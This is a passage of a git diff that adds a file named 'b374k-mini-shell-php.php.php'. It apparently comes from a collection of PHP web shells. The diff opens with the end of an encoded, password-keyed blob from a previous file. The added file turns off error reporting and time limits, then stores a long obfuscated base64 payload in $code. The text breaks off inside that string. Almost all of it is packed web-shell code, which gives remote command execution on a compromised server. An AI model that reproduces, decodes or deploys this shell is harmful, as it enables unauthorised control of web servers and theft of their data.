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",$s_pass);?>
\ No newline at end of file
diff --git a/php/b374k-mini-shell-php.php.php b/php/b374k-mini-shell-php.php.php
new file mode 100644
index 0000000..a1b4340
--- /dev/null
+++ b/php/b374k-mini-shell-php.php.php
@@ -0,0 +1,195 @@
+<?php
+
+@error_reporting(0);
+@set_time_limit(0); 
+
+
+$code = "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
+qx9vZx0dBuWjXuxe9jGbfTcy7sjzxa/7uprlZvb/onHf85tlpuZLZG3fS6jwn9yfj+5bj6/LMH9o
+PRmdg3Kf71/qoPD+p7nYuhXy733En23buJotk7s3cO3cbfbv5bBTkvtZ9Htclf94cX4+tvU1vx96
+/8QuN8V1z3n3sFLaV2wEaukGmkp/cdi5GA+HuJVdr16znk/l4Wr53tGlBvr/tT93dG9nXLqt2el/
+af9k/LlwOnOHtnt0YXFz1xtdqWzu78nqtRmO3UC9njMzOg3M/FM5O2vtnU7eTqW1f6vO7br+6eZV
+rjZT+QNcfeo3rqd7y1Z47mNWf+y8n56eZvXJXL88fjuXCpT6+y191nNNaJzfNnm930ZJuWrb08cP
+D/lmn5lVfurXNdH/POx7mrpu3F/JJOX3ue9WdqxOzUL073bzS5NrL0LnPnJnT095Lb6gct68MRTp
+reneXwqNqn6iNVu147Kj9Sv9e6yPeGbSH4/PNZ/9Cb+6NL23t4aLy0so9mlfN5+3HncHtY7+lX/X
+0Xf1lqFhnklut3j+MhrvC6MZvKyPTczNnle2XHdedX+v9zp5XyT9278yXzcuO0ZF2Gv3b57ZkPT7
+cNjbv+thLlGd+xzgSHx/PtfZ+fVKtS+lhutx/HhqDVk4qbx7XzPOT46zc3RmetR5P5+2L3O3UMUe
+5ifFgn6R77ui43td9JZ8fje9H43HXzQrX5n2zmz3pzvbO6qadyam9ppItXLxkK/VRJ3987XdP57e
+P6iC/nTvRpvLDRK6Uz9RKt2JlByeN6kDPzs60y4f7eX8yEPzrlwt15KdnF+fX+t3xtjd80Ab5R1W
++qrYtw+xfXLjzbbtfu9/V8s3H8/zJnXlXk+y2N2/sPU/nNydeprHfUm6qt8MTQU1PvfRg+OBdF05
+a2mmmJU+q5+X70/LL6ahvKi857aJWscxRtv48bg6ds12tmq6MJjue3G9L3XKjUy04VzvdK3t0lRE
+uW5cXhbOrvDO6cq41Z8/df6x1d7afBzuT++nOw+Pl7d3s4r4znyh394+b7bxuPtidguLtnb9cN6r
+GbfvZmt7I+8Om27GFsdTNyzuO1Mrues+P9u5Luzq6vbjL3jXSzZZVOz+VpIFc6/Se79qVF7XxmHv
+Rn68vu3P3ZP+mreZz9wU0I8ZXmd7z6bGwqalyv3FbM9rbd/Jla2jWs7L6kO+4zsXVrKB07yqdynG
+/bdze7zYms/0j7LMmyUMw1S1V9o/E/mOt2dq/mtTq9/3jtHfTbU1y2p1rvcxuKpmKc5K/aPnjFy1
+z33Rkr5q9GNoXtfS93vYr9c6uP9rZ2XzcL8wedrqZli8M/dPjfUnXPMe96Q47xxfewMpK45155Tq
+r3556jfF2rScNd52ueT24S5/f3Va2e3mjeZc/bu41ai9yTXP8KyRhc/vPQis30Tojo9I3Ktfj+84
+snb7Y7V8q3fpm60ZWh2jitoxpfdq2mookn7SqZau8O3g8bx6fXjlab1LJjy6uJ/tl7b568Sg8S/m
+6KRsP0kDbzVqF84teu6yN9qp27zp/29s2n7vp3szNHLcsOX+Sr3YHL+pe/7KRnWjOjol0wKZ/diV
+fnzmnd82J0PaGY0cp5DbdqX1RVRzFHT9qg2PVSqtTJIHyVjWX3dbbOwggXZnk0zvP0ot2cVnQazV
+ndHEjTeqXnevJ0dJogHa675z1pEF9Wj3L3KfriqY9Xt51a9l+9uGifqwatZf+47mh35m57p7d08/
+PLy+7RrqwPcwV3K42q87lzcdc+9lpeapbFo4fZv529rxvKH2/M5Lzyl6z8FIwL+VTtVwd7uzuZrx
+OWRrK2drtS+14+mJpw+OOUT8xCjvpfFfazvcd259VysfNwo4wnzvzh/JeRbp62ZlJd5WLbKf84Iy
+cvXvp4dG5qWavy2792Dxuzgcdv/Ngn99eyc30cyc/vqhk3fruZNAyr9MWksp7O4K+mcvKzW3H6jx
+07yTZ0Mfy1VV6Om6ePGszr3fWmShqprt5kZnMzwo9P//Qb97o1qBidCqWbu5J6cfReSVz3p7082W
+hOTzJ9Jubx4X785y5u59/Tt84Nw9nNWnc3c5X5vN5d1ar93v1snasd3Xr+Kxib5fvW2bNmOqjm+N
+8NZMe3KvPOhriB+F5Ij8MRvWymju9utafHwvPl9unDy/t1nGhPK6aZ6fPw7SZLWjZyun4xj6rP+y
+Usw0t51fz93U125teTPb2Htozf7edqwm7/cLktHozRUNWG453Gi/utl/duXyoWvas3j+ZKGfy/UV
+WN9x+Wbnr3dxcEq74uSQcar5plA7Boal06Ou+oZYODohrmGBmraxw+LOjOfQW2Rj2plGhg4PDNIE
+VDsnWGNmlxDt16XDDTCzxS2XYOzOQCZ3sSe4ImVWKLY/gLhtsAVYNFR6PZ3UFw2yk8OZfCq6/GdI
+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
